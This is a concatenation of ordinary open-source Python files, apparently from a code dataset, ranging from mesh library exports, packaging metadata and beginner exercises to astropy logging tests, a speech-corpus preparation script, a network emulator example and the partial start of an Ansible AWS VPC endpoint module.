volmesh_transform,
volmesh_transformed
)
if not compas.IPY:
from .network import (
network_adjacency_matrix,
network_connectivity_matrix,
network_degree_matrix,
network_laplacian_matrix,
)
from .mesh import (
mesh_adjacency_matrix,
mesh_connectivity_matrix,
mesh_contours_numpy,
mesh_degree_matrix,
mesh_face_matrix,
mesh_geodesic_distances_numpy,
mesh_isolines_numpy,
mesh_laplacian_matrix,
mesh_oriented_bounding_box_numpy,
mesh_oriented_bounding_box_xy_numpy,
mesh_transform_numpy,
mesh_transformed_numpy,
trimesh_cotangent_laplacian_matrix,
trimesh_descent,
trimesh_pull_points_numpy,
trimesh_samplepoints_numpy,
trimesh_smooth_laplacian_cotangent,
trimesh_vertexarea_matrix,
)
BaseNetwork = Network
BaseMesh = Mesh
BaseVolMesh = VolMesh
__all__ = [
'Datastructure',
# Graphs
'Graph',
# Networks
'BaseNetwork',
'Network',
'network_complement',
'network_count_crossings',
'network_disconnected_edges',
'network_disconnected_nodes',
'network_embed_in_plane_proxy',
'network_embed_in_plane',
'network_explode',
'network_find_crossings',
'network_find_cycles',
'network_is_connected',
'network_is_crossed',
'network_is_planar_embedding',
'network_is_planar',
'network_is_xy',
'network_join_edges',
'network_polylines',
'network_shortest_path',
'network_smooth_centroid',
'network_split_edge',
'network_transform',
'network_transformed',
# HalfEdge
'HalfEdge',
# Meshes
'BaseMesh',
'Mesh',
'mesh_add_vertex_to_face_edge',
'mesh_bounding_box_xy',
'mesh_bounding_box',
'mesh_collapse_edge',
'mesh_connected_components',
'mesh_conway_ambo',
'mesh_conway_bevel',
'mesh_conway_dual',
'mesh_conway_expand',
'mesh_conway_gyro',
'mesh_conway_join',
'mesh_conway_kis',
'mesh_conway_meta',
'mesh_conway_needle',
'mesh_conway_ortho',
'mesh_conway_snub',
'mesh_conway_truncate',
'mesh_conway_zip',
'mesh_delete_duplicate_vertices',
'mesh_disconnected_faces',
'mesh_disconnected_vertices',
'mesh_dual',
'mesh_explode',
'mesh_face_adjacency',
'mesh_flatness',
'mesh_flip_cycles',
'mesh_insert_vertex_on_edge',
'mesh_is_connected',
'mesh_merge_faces',
'mesh_offset',
'mesh_planarize_faces',
'mesh_quads_to_triangles',
'mesh_slice_plane',
'mesh_smooth_area',
'mesh_smooth_centerofmass',
'mesh_smooth_centroid',
'mesh_split_edge',
'mesh_split_face',
'mesh_split_strip',
'mesh_subdivide_catmullclark',
'mesh_subdivide_corner',
'mesh_subdivide_doosabin',
'mesh_subdivide_frames',
'mesh_subdivide_quad',
'mesh_subdivide_tri',
'mesh_subdivide',
'mesh_substitute_vertex_in_faces',
'mesh_thicken',
'mesh_transform',
'mesh_transformed',
'mesh_unify_cycles',
'mesh_unweld_edges',
'mesh_unweld_vertices',
'mesh_weld',
'meshes_join_and_weld',
'meshes_join',
'trimesh_collapse_edge',
'trimesh_face_circle',
'trimesh_gaussian_curvature',
'trimesh_mean_curvature',
'trimesh_remesh',
'trimesh_split_edge',
'trimesh_subdivide_loop',
'trimesh_swap_edge',
# HalfFace
'HalfFace',
# Volumetric Meshes
'BaseVolMesh',
'VolMesh',
'volmesh_bounding_box',
'volmesh_transform',
'volmesh_transformed',
]
if not compas.IPY:
__all__ += [
# Networks
'network_adjacency_matrix',
'network_connectivity_matrix',
'network_degree_matrix',
'network_laplacian_matrix',
# Meshes
'mesh_adjacency_matrix',
'mesh_connectivity_matrix',
'mesh_contours_numpy',
'mesh_degree_matrix',
'mesh_face_matrix',
'mesh_geodesic_distances_numpy',
'mesh_isolines_numpy',
'mesh_laplacian_matrix',
'mesh_oriented_bounding_box_numpy',
'mesh_oriented_bounding_box_xy_numpy',
'mesh_transform_numpy',
'mesh_transformed_numpy',
'trimesh_cotangent_laplacian_matrix',
'trimesh_descent',
'trimesh_pull_points_numpy',
'trimesh_samplepoints_numpy',
'trimesh_smooth_laplacian_cotangent',
'trimesh_vertexarea_matrix',
]
|
py | b415142cf112b9eae40d74b9083d6f20006407e0 | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
REQUIRED_PACKAGES = [
# 'tensorflow>=1.4.0,<=1.12.0',
'gensim==3.6.0',
'networkx==2.1',
'joblib==0.13.0',
'fastdtw==0.2.0',
'tqdm',
'numpy',
'scikit-learn',
'pandas',
'matplotlib',
]
setuptools.setup(
name="ge",
version="0.0.0",
author="Weichen Shen",
author_email="[email protected]",
url="https://github.com/shenweichen/GraphEmbedding",
packages=setuptools.find_packages(exclude=[]),
python_requires='>=3.4', # 3.4.6
install_requires=REQUIRED_PACKAGES,
extras_require={
"cpu": ['tensorflow>=1.4.0,!=1.7.*,!=1.8.*'],
"gpu": ['tensorflow-gpu>=1.4.0,!=1.7.*,!=1.8.*'],
},
entry_points={
},
license="MIT license",
)
|
py | b41514fef0e3636e846cf22045bcfc59266a150c | '''
#_*_coding:utf8-
print('222222')
a = raw_input('>>')
print(a)
# python day03.py >test.txt
# python day03.py <test.txt
'''
'''
a = 'abced'
i=0
while i<len(a):
print(a[i])
i=i+1
'''
'''
n =eval(raw_input(":"))
m= n
while n!=0:
n=eval(raw_input(":"))
if n>m:
m=n
print(m)
print(n)
'''
'''
import random
a=random.randint(0,10)
b=eval(raw_input("enter a between 0 and 10 number:"))
if b==a:
print("you are so smart!")
else:
while (b!=a):
if b>a:
print("big number,again")
b=eval(raw_input("enter a between 0 and 10 number:"))
if b<a:
print("small number,again")
b=eval(raw_input("enter a between 0 and 10 number:"))
if b==a:
print("you are so smart")
'''
'''
sum1 = 0
i=0
while(i<1001):
sum1=sum1+i
i=i+1
print(sum1)
'''
'''
s = 0
i = 1
for i in range (1000):
s=s+i
if s>10000:
print(i)
break
'''
'''
for i in range (10):
for j in range (1,i+1):
print ("{}*{}={} ".format(i,j,i*j),end='')
print(" ")
'''
def fun1(n1,n2,n3):
print(n1,n2,n3)
return (n1,n2,n3)
def fun2(n1,n2,n3):
a=n1*n1
b=n2*n2
c=n3*n3
print(a,b,c)
return(a,b,c)
def fun3(a,b,c):
e=(a-b)+(a-c)+(b-c)
print(e)
a,b,c=fun1(1,2,3)
x,y,z=fun2(a,b,c)
fun3(a,b,c)
|
py | b4151691f22b8c707b2dd0d74867f689d2a14302 | DNA = "AGCTTTTCATTCTGACTGCAACGGGCAATATGTCTCTGTGTGGATTAAAAAAAGAGTGTCTGATAGCAGC"
nucleotides = {
"adenine": DNA.count("A"),
"thymine": DNA.count("T"),
"guanine": DNA.count("G"),
"cytosine": DNA.count("C")
}
print(nucleotides)
|
py | b4151793b3d113c55eb4bf097f714c0fa757e341 | from typing import Callable, IO
from .typing import ILoader
class AutoLoader(ILoader):
def read(self, callback: Callable[[IO], any], **kwargs) -> any:
if "sample" in kwargs:
return self.read_sample(callback, **kwargs)
elif "source" in kwargs:
return self.read_file(callback, **kwargs)
else:
raise RuntimeError('No input data provided. Use keyward "source" or "sample"')
def read_sample(self, callback: Callable[[IO], any], **kwargs) -> any:
return callback(kwargs["sample"])
def read_file(self, callback: Callable[[IO], any], **kwargs) -> any:
with open(kwargs["source"], kwargs.get("mode", "r")) as fd:
return callback(fd)
|
py | b41518448673761c7d8d2fcec4da55f6f35c6803 | # Copyright 2019 Graphcore Ltd.
import re
import json
from tensorflow.python.ipu import utils
def get_config(report_n=1):
"""Builds ipu_options"""
config = utils.create_ipu_config(
profiling=False,
use_poplar_text_report=False,
report_every_nth_execution=report_n,
)
config = utils.auto_select_ipus(config, [1])
return config
start_time = 0
def extract_runtimes_from_report(report, display=True):
"""Returns timing information from IpuTraceEvent
report -- Array of text encoded IpuTraceEvent
"""
if len(report) is 0:
return
# Timings from tf xla event timestamps
from tensorflow.compiler.plugin.poplar.driver.trace_pb2 import IpuTraceEvent
# Retrieve IpuEvents, poplar report and cycles
events = list(map(IpuTraceEvent.FromString, report))
report = utils.extract_all_strings_from_event_trace(report)
m = list(map(int, re.findall("Program cycles\s*:\s*([\d\.]+)", report)))
global start_time
first = start_time == 0
if first:
start_time = events[0].timestamp
events = events[1:]
evt_str = "\nIPU Timings\n"
exec_num = 0
for evt in events:
extra_str = ""
if evt.type == IpuTraceEvent.COMPILE_BEGIN:
continue
elif evt.type == IpuTraceEvent.COMPILE_END:
evt_name = "Compile"
elif evt.type == IpuTraceEvent.HOST_TO_DEVICE_TRANSFER:
evt_name = "Host->Device"
extra_str = "\n Tensors:"
transfered_tensors = json.loads(
evt.data_transfer.data_transfer.decode("utf-8")
)
for t in transfered_tensors["tensors"]:
extra_str += "\n handle: {:>6}, size: {}".format(
t["name"], t["size"]
)
extra_str += "\n Total_size: {}".format(transfered_tensors["total_size"])
elif evt.type == IpuTraceEvent.DEVICE_TO_HOST_TRANSFER:
evt_name = "Device->Host"
extra_str = "\n Tensors:"
transfered_tensors = json.loads(
evt.data_transfer.data_transfer.decode("utf-8")
)
for t in transfered_tensors["tensors"]:
extra_str += "\n handle: {:>6}, size: {}".format(
t["name"], t["size"]
)
extra_str += "\n Total_size: {}".format(transfered_tensors["total_size"])
elif evt.type == IpuTraceEvent.LOAD_ENGINE:
evt_name = "Load engine"
elif evt.type == IpuTraceEvent.EXECUTE:
evt_name = "Execute"
if m and m[exec_num]:
execution_time = float(m[exec_num]) / (
1 * 1000 * 1000 * 1000
) # Implied 1GHz clock speed
extra_str = "\n Execution Time: {:.3g}s".format(execution_time)
extra_str += "\n Streaming Time: {:.3g}s".format(
(evt.timestamp - start_time) - execution_time
)
exec_num += 1
else:
evt_name = "Unknown event"
evt_str += "{:<15s}: {:<8.3g} s {}\n".format(
evt_name, (evt.timestamp - start_time), extra_str
)
start_time = evt.timestamp
# Print Cycle count from poplar report
evt_str += "\nCycle counts on IPU\n"
for execution_num, execution_cycles in enumerate(m):
evt_str += "Execution {} cycles : {}\n".format(execution_num, execution_cycles)
if display:
print(evt_str)
# Write Report to file
if first:
with open("report.txt", "w") as f:
f.write(report)
print("\nWritten to file: report.txt")
|
py | b4151bf9ccdf2a7b4f33213601c4d8d2974a35f9 | def int_to_string(num):
shift = ord('0')
result = []
sign = 1
# the magic number is 48, to shift the int correct
if num < 0:
sign = -1
num *= -1
while num > 0:
digit = num % 10
res = chr(digit + shift)
result.append(res)
num //= 10
if sign < 0:
result.append("-")
return "".join(result[::-1])
if __name__ == "__main__":
print(int_to_string(123))
print(int_to_string(-67154))
|
py | b4151dfceddfb4723bcbe47642e4e23ca0f15f73 | #!/usr/bin/env python3
# Copyright 2019 University of Stuttgart (Pavel Denisov)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import csv
import os
import random
import sys
import subprocess
def get_uttid(wav):
if '/' in wav:
return wav.split('/')[-4] + '_' + wav[-21:-4].replace('/', '')
idir = sys.argv[1]
bad_utts = set()
for filename in ['exclude_df_youtube_1120', 'public_exclude_file_v5']:
with open(idir + '/' + filename + '.csv') as bad_utts_list_file:
bad_utts_list = csv.DictReader(bad_utts_list_file)
for row in bad_utts_list:
bad_utts.add(get_uttid(row['wav']))
subsets = {'train': {}, 'dev': {}, 'test': {}}
words = ''
val_words = set()
for dataset in \
[
# first the validation datasets
'asr_calls_2_val',
'buriy_audiobooks_2_val',
'public_youtube700_val',
# next the training datasets
# (it needs all validation transcripts)
'asr_public_phone_calls_1',
'asr_public_phone_calls_2',
'asr_public_stories_1',
'asr_public_stories_2',
'private_buriy_audiobooks_2',
'public_lecture_1',
'public_series_1',
'public_youtube1120',
'public_youtube1120_hq',
'public_youtube700',
'radio_2',
'ru_RU',
'russian_single',
'tts_russian_addresses_rhvoice_4voices'
]:
with open(idir + '/' + dataset + '.csv') as metafile:
meta = csv.reader(metafile)
for row in meta:
wav = idir + row[1][19:][:-3] + 'mp3'
uttid = get_uttid(wav)
if uttid in bad_utts or not os.path.isfile(wav):
continue
with open(wav[:-3] + 'txt', encoding='utf-8') as text_file:
words = text_file.read().strip().lower()
subset = 'train'
if dataset[-4:] == '_val':
val_words.add(words)
subset = 'test'
elif words in val_words:
continue
if dataset not in subsets[subset]:
subsets[subset][dataset] = []
subsets[subset][dataset].append([uttid, words, wav])
for dataset in subsets['test'].keys():
subsets[dataset] = {'all': subsets['test'][dataset][:]}
for subset in subsets.keys():
if 'all' not in subsets[subset]:
subsets[subset]['all'] = sum(subsets[subset].values(), [])
random.seed(1)
random.shuffle(subsets['train']['all'])
dev_size = min(int(len(subsets['train']['all']) * 0.1), len(subsets['test']['all']))
subsets['dev']['all'] = subsets['train']['all'][:dev_size]
subsets['train']['all'] = subsets['train']['all'][dev_size:]
del subsets['test']
for subset in subsets.keys():
odir = 'data/' + subset
os.makedirs(odir, exist_ok=True)
with open(odir + '/text', 'w', encoding='utf-8') as text, \
open(odir + '/wav.scp', 'w') as wavscp, \
open(odir + '/utt2spk', 'w') as utt2spk:
for utt in subsets[subset]['all']:
[uttid, words, wav] = utt
text.write('{} {}\n'.format(uttid, words))
utt2spk.write('{} {}\n'.format(uttid, uttid))
wavscp.write('{} sox --norm=-1 {} -r 16k -t wav -c 1 -b 16 -e signed - |\n'.format(uttid, wav))
subprocess.call('utils/fix_data_dir.sh {}'.format(odir), shell=True)
|
py | b4151f3b9238b28a81c02556329b2e4a00b4fd85 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import importlib
import sys
import warnings
import logging
import locale
import pytest
from .helper import catch_warnings
from astropy import log
from astropy.logger import LoggingError, conf
from astropy.utils.exceptions import AstropyWarning, AstropyUserWarning
# Save original values of hooks. These are not the system values, but the
# already overwritten values since the logger already gets imported before
# this file gets executed.
_excepthook = sys.__excepthook__
_showwarning = warnings.showwarning
try:
ip = get_ipython()
except NameError:
ip = None
def setup_function(function):
# Reset modules to default
importlib.reload(warnings)
importlib.reload(sys)
# Reset internal original hooks
log._showwarning_orig = None
log._excepthook_orig = None
# Set up the logger
log._set_defaults()
# Reset hooks
if log.warnings_logging_enabled():
log.disable_warnings_logging()
if log.exception_logging_enabled():
log.disable_exception_logging()
teardown_module = setup_function
def test_warnings_logging_disable_no_enable():
with pytest.raises(LoggingError) as e:
log.disable_warnings_logging()
assert e.value.args[0] == 'Warnings logging has not been enabled'
def test_warnings_logging_enable_twice():
log.enable_warnings_logging()
with pytest.raises(LoggingError) as e:
log.enable_warnings_logging()
assert e.value.args[0] == 'Warnings logging has already been enabled'
def test_warnings_logging_overridden():
log.enable_warnings_logging()
warnings.showwarning = lambda: None
with pytest.raises(LoggingError) as e:
log.disable_warnings_logging()
assert e.value.args[0] == 'Cannot disable warnings logging: warnings.showwarning was not set by this logger, or has been overridden'
def test_warnings_logging():
# Without warnings logging
with catch_warnings() as warn_list:
with log.log_to_list() as log_list:
warnings.warn("This is a warning", AstropyUserWarning)
assert len(log_list) == 0
assert len(warn_list) == 1
assert warn_list[0].message.args[0] == "This is a warning"
# With warnings logging
with catch_warnings() as warn_list:
log.enable_warnings_logging()
with log.log_to_list() as log_list:
warnings.warn("This is a warning", AstropyUserWarning)
log.disable_warnings_logging()
assert len(log_list) == 1
assert len(warn_list) == 0
assert log_list[0].levelname == 'WARNING'
assert log_list[0].message.startswith('This is a warning')
assert log_list[0].origin == 'astropy.tests.test_logger'
# With warnings logging (differentiate between Astropy and non-Astropy)
with catch_warnings() as warn_list:
log.enable_warnings_logging()
with log.log_to_list() as log_list:
warnings.warn("This is a warning", AstropyUserWarning)
warnings.warn("This is another warning, not from Astropy")
log.disable_warnings_logging()
assert len(log_list) == 1
assert len(warn_list) == 1
assert log_list[0].levelname == 'WARNING'
assert log_list[0].message.startswith('This is a warning')
assert log_list[0].origin == 'astropy.tests.test_logger'
assert warn_list[0].message.args[0] == "This is another warning, not from Astropy"
# Without warnings logging
with catch_warnings() as warn_list:
with log.log_to_list() as log_list:
warnings.warn("This is a warning", AstropyUserWarning)
assert len(log_list) == 0
assert len(warn_list) == 1
assert warn_list[0].message.args[0] == "This is a warning"
def test_warnings_logging_with_custom_class():
class CustomAstropyWarningClass(AstropyWarning):
pass
# With warnings logging
with catch_warnings() as warn_list:
log.enable_warnings_logging()
with log.log_to_list() as log_list:
warnings.warn("This is a warning", CustomAstropyWarningClass)
log.disable_warnings_logging()
assert len(log_list) == 1
assert len(warn_list) == 0
assert log_list[0].levelname == 'WARNING'
assert log_list[0].message.startswith('CustomAstropyWarningClass: This is a warning')
assert log_list[0].origin == 'astropy.tests.test_logger'
def test_warning_logging_with_io_votable_warning():
from astropy.io.votable.exceptions import W02, vo_warn
with catch_warnings() as warn_list:
log.enable_warnings_logging()
with log.log_to_list() as log_list:
vo_warn(W02, ('a', 'b'))
log.disable_warnings_logging()
assert len(log_list) == 1
assert len(warn_list) == 0
assert log_list[0].levelname == 'WARNING'
x = log_list[0].message.startswith("W02: ?:?:?: W02: a attribute 'b' is "
"invalid. Must be a standard XML id")
assert x
assert log_list[0].origin == 'astropy.tests.test_logger'
def test_import_error_in_warning_logging():
"""
Regression test for https://github.com/astropy/astropy/issues/2671
This test actually puts a goofy fake module into ``sys.modules`` to test
this problem.
"""
class FakeModule:
def __getattr__(self, attr):
raise ImportError('_showwarning should ignore any exceptions '
'here')
log.enable_warnings_logging()
sys.modules['<test fake module>'] = FakeModule()
try:
warnings.showwarning(AstropyWarning('Regression test for #2671'),
AstropyWarning, '<this is only a test>', 1)
finally:
del sys.modules['<test fake module>']
def test_exception_logging_disable_no_enable():
with pytest.raises(LoggingError) as e:
log.disable_exception_logging()
assert e.value.args[0] == 'Exception logging has not been enabled'
def test_exception_logging_enable_twice():
log.enable_exception_logging()
with pytest.raises(LoggingError) as e:
log.enable_exception_logging()
assert e.value.args[0] == 'Exception logging has already been enabled'
# You can't really override the exception handler in IPython this way, so
# this test doesn't really make sense in the IPython context.
@pytest.mark.skipif("ip is not None")
def test_exception_logging_overridden():
log.enable_exception_logging()
sys.excepthook = lambda etype, evalue, tb: None
with pytest.raises(LoggingError) as e:
log.disable_exception_logging()
assert e.value.args[0] == 'Cannot disable exception logging: sys.excepthook was not set by this logger, or has been overridden'
@pytest.mark.xfail("ip is not None")
def test_exception_logging():
# Without exception logging
try:
with log.log_to_list() as log_list:
raise Exception("This is an Exception")
except Exception as exc:
sys.excepthook(*sys.exc_info())
assert exc.args[0] == "This is an Exception"
else:
assert False # exception should have been raised
assert len(log_list) == 0
# With exception logging
try:
log.enable_exception_logging()
with log.log_to_list() as log_list:
raise Exception("This is an Exception")
except Exception as exc:
sys.excepthook(*sys.exc_info())
assert exc.args[0] == "This is an Exception"
else:
assert False # exception should have been raised
assert len(log_list) == 1
assert log_list[0].levelname == 'ERROR'
assert log_list[0].message.startswith('Exception: This is an Exception')
assert log_list[0].origin == 'astropy.tests.test_logger'
# Without exception logging
log.disable_exception_logging()
try:
with log.log_to_list() as log_list:
raise Exception("This is an Exception")
except Exception as exc:
sys.excepthook(*sys.exc_info())
assert exc.args[0] == "This is an Exception"
else:
assert False # exception should have been raised
assert len(log_list) == 0
@pytest.mark.xfail("ip is not None")
def test_exception_logging_origin():
# The point here is to get an exception raised from another location
# and make sure the error's origin is reported correctly
from astropy.utils.collections import HomogeneousList
l = HomogeneousList(int)
try:
log.enable_exception_logging()
with log.log_to_list() as log_list:
l.append('foo')
except TypeError as exc:
sys.excepthook(*sys.exc_info())
assert exc.args[0].startswith(
"homogeneous list must contain only objects of type ")
else:
assert False
assert len(log_list) == 1
assert log_list[0].levelname == 'ERROR'
assert log_list[0].message.startswith(
"TypeError: homogeneous list must contain only objects of type ")
assert log_list[0].origin == 'astropy.utils.collections'
@pytest.mark.skip(reason="Infinite recursion on Python 3.5+, probably a real issue")
#@pytest.mark.xfail("ip is not None")
def test_exception_logging_argless_exception():
"""
Regression test for a crash that occurred on Python 3 when logging an
exception that was instantiated with no arguments (no message, etc.)
Regression test for https://github.com/astropy/astropy/pull/4056
"""
try:
log.enable_exception_logging()
with log.log_to_list() as log_list:
raise Exception()
except Exception as exc:
sys.excepthook(*sys.exc_info())
else:
assert False # exception should have been raised
assert len(log_list) == 1
assert log_list[0].levelname == 'ERROR'
assert log_list[0].message == 'Exception [astropy.tests.test_logger]'
assert log_list[0].origin == 'astropy.tests.test_logger'
@pytest.mark.parametrize(('level'), [None, 'DEBUG', 'INFO', 'WARN', 'ERROR'])
def test_log_to_list(level):
orig_level = log.level
try:
if level is not None:
log.setLevel(level)
with log.log_to_list() as log_list:
log.error("Error message")
log.warning("Warning message")
log.info("Information message")
log.debug("Debug message")
finally:
log.setLevel(orig_level)
if level is None:
# The log level *should* be set to whatever it was in the config
level = conf.log_level
# Check list length
if level == 'DEBUG':
assert len(log_list) == 4
elif level == 'INFO':
assert len(log_list) == 3
elif level == 'WARN':
assert len(log_list) == 2
elif level == 'ERROR':
assert len(log_list) == 1
# Check list content
assert log_list[0].levelname == 'ERROR'
assert log_list[0].message.startswith('Error message')
assert log_list[0].origin == 'astropy.tests.test_logger'
if len(log_list) >= 2:
assert log_list[1].levelname == 'WARNING'
assert log_list[1].message.startswith('Warning message')
assert log_list[1].origin == 'astropy.tests.test_logger'
if len(log_list) >= 3:
assert log_list[2].levelname == 'INFO'
assert log_list[2].message.startswith('Information message')
assert log_list[2].origin == 'astropy.tests.test_logger'
if len(log_list) >= 4:
assert log_list[3].levelname == 'DEBUG'
assert log_list[3].message.startswith('Debug message')
assert log_list[3].origin == 'astropy.tests.test_logger'
def test_log_to_list_level():
with log.log_to_list(filter_level='ERROR') as log_list:
log.error("Error message")
log.warning("Warning message")
assert len(log_list) == 1 and log_list[0].levelname == 'ERROR'
def test_log_to_list_origin1():
with log.log_to_list(filter_origin='astropy.tests') as log_list:
log.error("Error message")
log.warning("Warning message")
assert len(log_list) == 2
def test_log_to_list_origin2():
with log.log_to_list(filter_origin='astropy.wcs') as log_list:
log.error("Error message")
log.warning("Warning message")
assert len(log_list) == 0
@pytest.mark.parametrize(('level'), [None, 'DEBUG', 'INFO', 'WARN', 'ERROR'])
def test_log_to_file(tmpdir, level):
local_path = tmpdir.join('test.log')
log_file = local_path.open('wb')
log_path = str(local_path.realpath())
orig_level = log.level
try:
if level is not None:
log.setLevel(level)
with log.log_to_file(log_path):
log.error("Error message")
log.warning("Warning message")
log.info("Information message")
log.debug("Debug message")
log_file.close()
finally:
log.setLevel(orig_level)
log_file = local_path.open('rb')
log_entries = log_file.readlines()
log_file.close()
if level is None:
# The log level *should* be set to whatever it was in the config
level = conf.log_level
# Check list length
if level == 'DEBUG':
assert len(log_entries) == 4
elif level == 'INFO':
assert len(log_entries) == 3
elif level == 'WARN':
assert len(log_entries) == 2
elif level == 'ERROR':
assert len(log_entries) == 1
# Check list content
assert eval(log_entries[0].strip())[-3:] == (
'astropy.tests.test_logger', 'ERROR', 'Error message')
if len(log_entries) >= 2:
assert eval(log_entries[1].strip())[-3:] == (
'astropy.tests.test_logger', 'WARNING', 'Warning message')
if len(log_entries) >= 3:
assert eval(log_entries[2].strip())[-3:] == (
'astropy.tests.test_logger', 'INFO', 'Information message')
if len(log_entries) >= 4:
assert eval(log_entries[3].strip())[-3:] == (
'astropy.tests.test_logger', 'DEBUG', 'Debug message')
def test_log_to_file_level(tmpdir):
local_path = tmpdir.join('test.log')
log_file = local_path.open('wb')
log_path = str(local_path.realpath())
with log.log_to_file(log_path, filter_level='ERROR'):
log.error("Error message")
log.warning("Warning message")
log_file.close()
log_file = local_path.open('rb')
log_entries = log_file.readlines()
log_file.close()
assert len(log_entries) == 1
assert eval(log_entries[0].strip())[-2:] == (
'ERROR', 'Error message')
def test_log_to_file_origin1(tmpdir):
local_path = tmpdir.join('test.log')
log_file = local_path.open('wb')
log_path = str(local_path.realpath())
with log.log_to_file(log_path, filter_origin='astropy.tests'):
log.error("Error message")
log.warning("Warning message")
log_file.close()
log_file = local_path.open('rb')
log_entries = log_file.readlines()
log_file.close()
assert len(log_entries) == 2
def test_log_to_file_origin2(tmpdir):
local_path = tmpdir.join('test.log')
log_file = local_path.open('wb')
log_path = str(local_path.realpath())
with log.log_to_file(log_path, filter_origin='astropy.wcs'):
log.error("Error message")
log.warning("Warning message")
log_file.close()
log_file = local_path.open('rb')
log_entries = log_file.readlines()
log_file.close()
assert len(log_entries) == 0
@pytest.mark.parametrize(('encoding'), ['', 'utf-8', 'cp1252'])
def test_log_to_file_encoding(tmpdir, encoding):
local_path = tmpdir.join('test.log')
log_path = str(local_path.realpath())
orig_encoding = conf.log_file_encoding
conf.log_file_encoding = encoding
with log.log_to_file(log_path):
for handler in log.handlers:
if isinstance(handler, logging.FileHandler):
if encoding:
assert handler.stream.encoding == encoding
else:
assert handler.stream.encoding == locale.getpreferredencoding()
conf.log_file_encoding = orig_encoding
|
py | b41520d8929bd5926428e94b280143f7304f1e7d | import logging
from core.emulator.coreemu import CoreEmu
from core.emulator.data import IpPrefixes, NodeOptions
from core.emulator.enumerations import EventTypes
from core.nodes.base import CoreNode
from core.nodes.lxd import LxcNode
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
coreemu = CoreEmu()
session = coreemu.create_session()
session.set_state(EventTypes.CONFIGURATION_STATE)
try:
prefixes = IpPrefixes(ip4_prefix="10.83.0.0/16")
options = NodeOptions(image="ubuntu")
# create node one
node1 = session.add_node(LxcNode, options=options)
interface1_data = prefixes.create_iface(node1)
# create node two
node2 = session.add_node(CoreNode)
interface2_data = prefixes.create_iface(node2)
# add link
session.add_link(node1.id, node2.id, interface1_data, interface2_data)
# instantiate
session.instantiate()
finally:
input("continue to shutdown")
coreemu.shutdown()
|
py | b4152128ddef4535973f6bfed29ffbc059610290 | #!/usr/bin/python
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
module: ec2_vpc_endpoint_info
short_description: Retrieves AWS VPC endpoints details using AWS methods.
version_added: 1.0.0
description:
- Gets various details related to AWS VPC endpoints.
options:
query:
description:
- Defaults to C(endpoints).
- Specifies the query action to take.
- I(query=endpoints) returns information about AWS VPC endpoints.
- Retrieving information about services using I(query=services) has been
deprecated in favour of the M(amazon.aws.ec2_vpc_endpoint_service_info) module.
- The I(query) option has been deprecated and will be removed after 2022-12-01.
required: False
choices:
- services
- endpoints
type: str
vpc_endpoint_ids:
description:
- The IDs of specific endpoints to retrieve the details of.
type: list
elements: str
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value.
See U(https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeVpcEndpoints.html)
for possible filters.
type: dict
author: Karen Cheng (@Etherdaemon)
extends_documentation_fragment:
- amazon.aws.aws
- amazon.aws.ec2
'''
EXAMPLES = r'''
# Simple example of listing all support AWS services for VPC endpoints
- name: List supported AWS endpoint services
amazon.aws.ec2_vpc_endpoint_info:
query: services
region: ap-southeast-2
register: supported_endpoint_services
- name: Get all endpoints in ap-southeast-2 region
amazon.aws.ec2_vpc_endpoint_info:
query: endpoints
region: ap-southeast-2
register: existing_endpoints
- name: Get all endpoints with specific filters
amazon.aws.ec2_vpc_endpoint_info:
query: endpoints
region: ap-southeast-2
filters:
vpc-id:
- vpc-12345678
- vpc-87654321
vpc-endpoint-state:
- available
- pending
register: existing_endpoints
- name: Get details on specific endpoint
amazon.aws.ec2_vpc_endpoint_info:
query: endpoints
region: ap-southeast-2
vpc_endpoint_ids:
- vpce-12345678
register: endpoint_details
'''
RETURN = r'''
service_names:
description: AWS VPC endpoint service names
returned: I(query) is C(services)
type: list
sample:
service_names:
- com.amazonaws.ap-southeast-2.s3
vpc_endpoints:
description:
- A list of endpoints that match the query. Each endpoint has the keys creation_timestamp,
policy_document, route_table_ids, service_name, state, vpc_endpoint_id, vpc_id.
returned: I(query) is C(endpoints)
type: list
sample:
vpc_endpoints:
- creation_timestamp: "2017-02-16T11:06:48+00:00"
policy_document: >
"{\"Version\":\"2012-10-17\",\"Id\":\"Policy1450910922815\",
\"Statement\":[{\"Sid\":\"Stmt1450910920641\",\"Effect\":\"Allow\",
\"Principal\":\"*\",\"Action\":\"s3:*\",\"Resource\":[\"arn:aws:s3:::*/*\",\"arn:aws:s3:::*\"]}]}"
route_table_ids:
- rtb-abcd1234
service_name: "com.amazonaws.ap-southeast-2.s3"
state: "available"
vpc_endpoint_id: "vpce-abbad0d0"
vpc_id: "vpc-1111ffff"
'''
try:
import botocore
except ImportError:
pass # Handled by AnsibleAWSModule
from ansible.module_utils.common.dict_transformations import camel_dict_to_snake_dict
from ansible_collections.amazon.aws.plugins.module_utils.core import AnsibleAWSModule
from ansible_collections.amazon.aws.plugins.module_utils.core import is_boto3_error_code
from ansible_collections.amazon.aws.plugins.module_utils.core import normalize_boto3_result
from ansible_collections.amazon.aws.plugins.module_utils.ec2 import AWSRetry
from ansible_collections.amazon.aws.plugins.module_utils.ec2 import ansible_dict_to_boto3_filter_list
@AWSRetry.jittered_backoff()
def _describe_endpoints(client, **params):
paginator = client.get_paginator('describe_vpc_endpoints')
return paginator.paginate(**params).build_full_result()
@AWSRetry.jittered_backoff()
def _describe_endpoint_services(client, **params):
paginator = client.get_paginator('describe_vpc_endpoint_services')
return paginator.paginate(**params).build_full_result()
def get_supported_services(client, module):
try:
services = _describe_endpoint_services(client)
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
module.fail_json_aws(e, msg="Failed to get endpoint servicess")
results = list(services['ServiceNames'])
return dict(service_names=results)
def get_endpoints(client, module):
results = list()
params = dict()
params['Filters'] = ansible_dict_to_boto3_filter_list(module.params.get('filters'))
if module.params.get('vpc_endpoint_ids'):
params['VpcEndpointIds'] = module.params.get('vpc_endpoint_ids')
try:
results = _describe_endpoints(client, **params)['VpcEndpoints']
results = normalize_boto3_result(results)
except is_boto3_error_code('InvalidVpcEndpointId.NotFound'):
